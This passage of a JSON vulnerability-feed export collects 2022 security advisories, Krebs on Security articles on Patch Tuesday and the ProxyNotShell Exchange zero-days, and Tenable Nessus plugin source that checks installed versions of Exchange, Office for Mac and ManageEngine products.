"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-28T08:52:38", "type": "hivepro", "title": "Threat Actors launch a campaign to exploit vulnerability in Fortinet", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-28T08:52:38", "id": "HIVEPRO:5EF44DD9474A0410F4E4758ABB19D17A", "href": "https://www.hivepro.com/threat-actors-launch-a-campaign-to-exploit-vulnerability-in-fortinet/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-11T10:11:40", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary FortiOS and FortiProxy has an authentication bypass vulnerability, CVE-2022-40684, that could allow remote attackers access to the administrative interface.", "cvss3": {}, "published": "2022-10-11T07:22:07", "type": "hivepro", "title": "Vulnerability in Fortinet allows authentication bypass", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-11T07:22:07", "id": "HIVEPRO:621DD8CA375634712F01438EF8C1AE13", "href": "https://www.hivepro.com/vulnerability-in-fortinet-allows-authentication-bypass/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-30T12:04:33", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary A zero-day vulnerability in the User Portal and WebAdmin of Sophos Firewall has been tracked as CVE-2022-3236. This vulnerability is been used by some unknown attackers to target organizations in South Asia.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T10:12:52", "type": "hivepro", "title": "Sophos Zero-day vulnerability becomes target for attackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-3236"], "modified": "2022-09-30T10:12:52", "id": "HIVEPRO:CCB5F51160D6B20ECA6FFFB5297C4704", "href": "https://www.hivepro.com/sophos-zero-day-vulnerability-becomes-target-for-attackers/", "cvss": {"score": 0.0, "vector": "NONE"}}], "krebs": [{"lastseen": "2022-10-12T04:30:32", "description": "**Microsoft** today released updates to fix at least 85 security holes in its **Windows** operating systems and related software, including a new zero-day vulnerability in all supported versions of Windows that is being actively exploited. However, noticeably absent from this month&#x27;s Patch Tuesday are any updates to address a pair of zero-day flaws being exploited this past month in **Microsoft Exchange Server**.\n\n\n\nThe new zero-day flaw- [CVE-2022-41033](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033>) -- is an &quot;elevation of privilege&quot; bug in the Windows COM+ event service, which provides system notifications when users logon or logoff. Microsoft says the flaw is being actively exploited, and that it was reported by an anonymous individual.\n\n&quot;Despite its relatively low score in comparison to other vulnerabilities patched today, this one should be at the top of everyone&#x27;s list to quickly patch,&quot; said **Kevin Breen**, director of cyber threat research at **Immersive Labs**. &quot;This specific vulnerability is a local privilege escalation, which means that an attacker would already need to have code execution on a host to use this exploit. Privilege escalation vulnerabilities are a common occurrence in almost every security compromise. Attackers will seek to gain SYSTEM or domain-level access in order to disable security tools, grab credentials with tools like Mimkatz and move laterally across the network.\n\nIndeed, **Satnam Narang**, senior staff research engineer at **Tenable**, notes that almost half of the security flaws Microsoft patched this week are elevation of privilege bugs.\n\nSome privilege escalation bugs can be particularly scary. One example is [CVE-2022-37968](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37968>), which affects organizations running **Kubernetes** clusters on **Azure** and earned a CVSS score of 10.0 -- the most severe score possible.\n\nMicrosoft says that to exploit this vulnerability an attacker would need to know the randomly generated DNS endpoint for an Azure Arc-enabled Kubernetes cluster. But that may not be such a tall order, says Breen, who notes that a number of free and commercial DNS discovery services now make it easy to find this information on potential targets.\n\nLate last month, Microsoft acknowledged that attackers were [exploiting two previously unknown vulnerabilities in Exchange Server](<https://krebsonsecurity.com/2022/09/microsoft-two-new-0-day-flaws-in-exchange-server/>). Paired together, the two flaws are known as &quot;ProxyNotShell&quot; and they can be chained to allow remote code execution on Exchange Server systems.\n\nMicrosoft said it was expediting work on official patches for the Exchange bugs, and it urged affected customers to enable certain settings to mitigate the threat from the attacks. However, those mitigation steps were soon shown to be ineffective, and Microsoft has been [adjusting them on a daily basis nearly each day since then](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>).\n\nThe lack of Exchange patches leaves a lot of Microsoft customers exposed. Security firm **Rapid7** said that as of early September 2022 the company observed more than 190,000 potentially vulnerable instances of Exchange Server exposed to the Internet.\n\n&quot;While Microsoft confirmed the zero-days and issued guidance faster than they have in the past, there are still no patches nearly two weeks out from initial disclosure,&quot; said **Caitlin Condon**, senior manager of vulnerability research at Rapid7. &quot;Despite high hopes that today&#x27;s Patch Tuesday release would contain fixes for the vulnerabilities, Exchange Server is conspicuously missing from the initial list of October 2022 security updates. Microsoft\u2019s recommended rule for blocking known attack patterns has been bypassed multiple times, emphasizing the necessity of a true fix.&quot;\n\nAdobe also released [security updates to fix 29 vulnerabilities](<https://helpx.adobe.com/security.html>) across a variety of products, including **Acrobat** and **Reader**, **ColdFusion**, **Commerce** and **Magento**. Adobe said it is not aware of active attacks against any of these flaws.\n\nFor a closer look at the patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/October%202022%20Microsoft%20Patch%20Tuesday/29138/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/>) usually has the lowdown on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-11T21:06:23", "type": "krebs", "title": "Microsoft Patch Tuesday, October 2022 Edition", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-37968", "CVE-2022-41033"], "modified": "2022-10-11T21:06:23", "id": "KREBS:04BF4A7775A9C0B7DE1A20C71586245A", "href": "https://krebsonsecurity.com/2022/10/microsoft-patch-tuesday-october-2022-edition/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-03T06:04:32", "description": "**Microsoft Corp.** is investigating reports that attackers are exploiting two previously unknown vulnerabilities in **Exchange Server**, a technology many organizations rely on to send and receive email. Microsoft says it is expediting work on software patches to plug the security holes. In the meantime, it is urging a subset of Exchange customers to enable a setting that could help mitigate ongoing attacks.\n\n\n\nIn [customer guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) released Thursday, Microsoft said it is investigating two reported zero-day flaws affecting Microsoft Exchange Server 2013, 2016, and 2019. [CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-41040>), is a Server-Side Request Forgery (SSRF) vulnerability that can enable an authenticated attacker to remotely trigger the second zero-day vulnerability -- [CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082>) -- which allows remote code execution (RCE) when **PowerShell** is accessible to the attacker.\n\nMicrosoft said **Exchange Online** has detections and mitigation in place to protect customers. Customers using _on-premises_ Microsoft Exchange servers are urged to review the mitigations suggested in the security advisory, which Microsoft says should block the known attack patterns.\n\nVietnamese security firm **GTSC** on Thursday [published a writeup on the two Exchange zero-day flaws](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>), saying it first observed the attacks in early August being used to drop &quot;webshells.&quot; These web-based backdoors offer attackers an easy-to-use, password-protected hacking tool that can be accessed over the Internet from any browser.\n\n&quot;We detected webshells, mostly obfuscated, being dropped to Exchange servers,&quot; GTSC wrote. &quot;Using the user-agent, we detected that the attacker uses Antsword, an active Chinese-based opensource cross-platform website administration tool that supports webshell management. We suspect that these come from a Chinese attack group because the webshell codepage is 936, which is a Microsoft character encoding for simplified Chinese.&quot;\n\nGTSC&#x27;s advisory includes details about post-compromise activity and related malware, as well as steps it took to help customers respond to active compromises of their Exchange Server environment. But the company said it would withhold more technical details of the vulnerabilities for now.\n\nIn March 2021, hundreds of thousands of organizations worldwide had their email stolen and multiple backdoor webshells installed, all thanks to [four zero-day vulnerabilities in Exchange Server](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>). \n\nGranted, the zero-day flaws that powered that debacle were far more critical than the two detailed this week, and there are no signs yet that exploit code has been publicly released (that will likely change soon). But part of what made last year&#x27;s Exchange Server mass hack so pervasive was that vulnerable organizations had little or no advance notice on what to look for before their Exchange Server environments were completely owned by multiple attackers. \n\nMicrosoft is quick to point out that these zero-day flaws require an attacker to have a valid username and password for an Exchange user, but this may not be such a tall order for the hackers behind these latest exploits against Exchange Server. \n\n**Steven Adair** is president of [Volexity](<https://www.volexity.com>), the Virginia-based cybersecurity firm that was among the first to sound the alarm about the Exchange zero-days targeted in the 2021 mass hack. Adair said GTSC&#x27;s writeup includes an Internet address used by the attackers that Volexity has tied with high confidence to a China-based hacking group that has recently been observed phishing Exchange users for their credentials. \n\nIn February 2022, Volexity [warned](<https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/>) that this same Chinese hacking group was behind the mass exploitation of a zero-day vulnerability in the **Zimbra Collaboration Suite**, which is a competitor to Microsoft Exchange that many enterprises use to manage email and other forms of messaging. \n\nIf your organization runs Exchange Server, please consider reviewing [the Microsoft mitigations](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) and [the GTSC post-mortem](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) on their investigations.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T16:51:57", "type": "krebs", "title": "Microsoft: Two New 0-Day Flaws in Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T16:51:57", "id": "KREBS:6E25B247DFBFC9267C00F36CE0695768", "href": "https://krebsonsecurity.com/2022/09/microsoft-two-new-0-day-flaws-in-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2023-01-13T00:56:38", "description": "The Microsoft Exchange Server installed on the remote host is potentially affected by multiple zero-day vulnerabilities, dubbed ProxyNotShell:\n\n - An unspecified authenticated server-side request forgery (SSRF) vulnerability. (CVE-2022-41040)\n\n - An unspecified authenticated remote code execution (RCE) vulnerability when PowerShell is accessible to the attacker. (CVE-2022-41082)\n\nPlease refer to Microsoft for guidance on mitigations for these vulnerabilities.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-05T00:00:00", "type": "nessus", "title": "Microsoft Exchange Server October 2022 Zero-day Vulnerabilities (ProxyNotShell)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2023-01-12T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS22_OCT_EXCHANGE_ZERODAY.NASL", "href": "https://www.tenable.com/plugins/nessus/165705", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc. \n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(165705);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2022-41040\", \"CVE-2022-41082\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/21\");\n script_xref(name:\"IAVA\", value:\"2022-A-0474-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0031\");\n\n script_name(english:\"Microsoft Exchange Server October 2022 Zero-day Vulnerabilities (ProxyNotShell)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is potentially affected by multiple zero-day vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host is potentially affected by multiple zero-day\nvulnerabilities, dubbed ProxyNotShell:\n\n - An unspecified authenticated server-side request forgery (SSRF) vulnerability. (CVE-2022-41040)\n\n - An unspecified authenticated remote code execution (RCE) vulnerability when PowerShell is accessible to the\n attacker. (CVE-2022-41082)\n\nPlease refer to Microsoft for guidance on mitigations for these vulnerabilities.\");\n # https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57fc3035\");\n # https://www.tenable.com/blog/cve-2022-41040-and-cve-2022-41082-proxyshell-variant-exploited-in-the-wild\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7cacb5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://community.tenable.com/s/feed/0D53a00008oIvkYCAS\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact Microsoft for patching guidance.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyNotShell RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'cu': 23,\n 'unsupported_cu': 22,\n 'fixed_version': '15.0.1497.42.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product' : '2016',\n 'cu': 22,\n 'unsupported_cu': 21,\n 'fixed_version': '15.1.2375.32.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product': '2016',\n 'cu': 23,\n 'unsupported_cu': 21,\n 'fixed_version': '15.1.2507.13.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product' : '2019',\n 'cu': 11,\n 'unsupported_cu': 10,\n 'fixed_version': '15.2.986.36',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product' : '2019',\n 'cu': 12,\n 'unsupported_cu': 10,\n 'fixed_version': '15.2.1118.15.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-09T02:44:58", "description": "This plugin detects the potential presence of a web shell in selected directories and this can be indicative that the host might have been exploited with CVE-2022-41040 / CVE-2022-41082. It is recommended that the results are manually verified and appropriate remediation actions taken.\n\nNote that Nessus has not tested for this issue but has instead looked for files that could potentially indicate compromise.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "nessus", "title": "Potential exposure to Microsoft Exchange CVE-2022-41040 / CVE-2022-41082 Exploit", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "EXCHANGE_CVE-2022-41040_IOC.NBIN", "href": "https://www.tenable.com/plugins/nessus/165629", "sourceData": "Binary data exchange_cve-2022-41040_ioc.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:35:03", "description": "The Microsoft Office Products are missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerabilities. An attacker can exploit these to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-38048, CVE-2022-41031)\n\n - A information disclosure vulnerability in Excel. An attacker who exploited the vulnerability could use the information together with other vulnerabilities in order to compromise the user\u2019s computer or data. (CVE-2022-41043)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-13T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Office Products (Oct 2022) (macOS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-38048", "CVE-2022-41031", "CVE-2022-41043"], "modified": "2022-11-29T00:00:00", "cpe": ["cpe:/a:microsoft:office"], "id": "MACOS_MS22_OCT_OFFICE.NASL", "href": "https://www.tenable.com/plugins/nessus/166102", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc. \n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166102);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/29\");\n\n script_cve_id(\"CVE-2022-38048\", \"CVE-2022-41031\", \"CVE-2022-41043\");\n script_xref(name:\"IAVA\", value:\"2022-A-0412-S\");\n\n script_name(english:\"Security Updates for Microsoft Office Products (Oct 2022) (macOS)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Office Products are affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Office Products are missing security updates. It is, therefore, affected by multiple \nvulnerabilities:\n\n - A remote code execution vulnerabilities. An attacker can exploit these to bypass authentication and \n execute unauthorized arbitrary commands. (CVE-2022-38048, CVE-2022-41031)\n\n - A information disclosure vulnerability in Excel. An attacker who exploited the vulnerability could use \n the information together with other vulnerabilities in order to compromise the user\u00e2\u0080\u0099s computer or data. \n (CVE-2022-41043)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://docs.microsoft.com/en-us/officeupdates/update-history-office-for-mac\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?43ed1b90\");\n # https://learn.microsoft.com/en-us/officeupdates/release-notes-office-for-mac#october-11-2022\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2b57ae29\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Microsoft Office for Mac.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41031\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_office_installed.nbin\");\n script_require_keys(\"Host/MacOSX/Version\");\n script_require_ports(\"installed_sw/Microsoft Outlook\", \"installed_sw/Microsoft Excel\", \"installed_sw/Microsoft Word\", \"installed_sw/Microsoft PowerPoint\", \"installed_sw/Microsoft OneNote\");\n\n exit(0);\n}\n\ninclude('vcf_extras_office.inc');\n\nvar apps = make_list('Microsoft Outlook', 'Microsoft Excel', 'Microsoft Word',\n 'Microsoft PowerPoint','Microsoft OneNote');\n\nvar app_info = vcf::microsoft::office_for_mac::get_app_info(apps:apps);\n\nvar constraints = [\n {'min_version':'16.17.0', 'fixed_version':'16.66', 'fixed_display':'16.66 (22100900)'}\n];\n\nvcf::microsoft::office_for_mac::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n os_min_lvl:'10.15.0'\n);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-09T17:10:38", "description": "The remote host is running a version of ManageEngine Access Manager Plus prior to 4.3 Build 4303. It is, therefore, affected by an authenticated remote code execution vulnerability.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T00:00:00", "type": "nessus", "title": "ManageEngine Access Manager Plus < 4.3 Build 4303 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_access_manager_plus"], "id": "MANAGEENGINE_ACCESS_MANAGER_PLUS_4303.NASL", "href": "https://www.tenable.com/plugins/nessus/166059", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166059);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2022-35405\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/13\");\n\n script_name(english:\"ManageEngine Access Manager Plus < 4.3 Build 4303 RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an authenticated remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of ManageEngine Access Manager Plus prior to 4.3 Build 4303. \nIt is, therefore, affected by an authenticated remote code execution vulnerability.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/passwordmanagerpro/advisory/rce.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4907c125\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Access Manager Plus version 4.3 Build 4303 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-35405\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zoho Password Manager Pro XML-RPC Java Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_access_manager_plus\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_access_manager_plus_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Access Manager Plus\");\n script_require_ports(\"Services/www\", 7272);\n\n exit(0);\n}\n\ninclude('vcf_extras_zoho.inc');\ninclude('http.inc');\n\nvar appname = 'ManageEngine Access Manager Plus';\nvar port = get_http_port(default:7272, embedded:TRUE);\n\nvar app_info = vcf::zoho::fix_parse::get_app_info(app:appname, port:port);\n\nvar constraints = [\n { 'fixed_version' : '4303', 'fixed_display' : '4.3 Build 4303' }\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-10T10:48:00", "description": "The remote host is running a version of ManageEngine PAM360 prior to 5.5 Build 5510. It is, therefore, affected by a remote code execution vulnerability. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands on the remote host.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T00:00:00", "type": "nessus", "title": "ManageEngine PAM360 < 5.5 Build 5510 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2023-01-17T00:00:00", 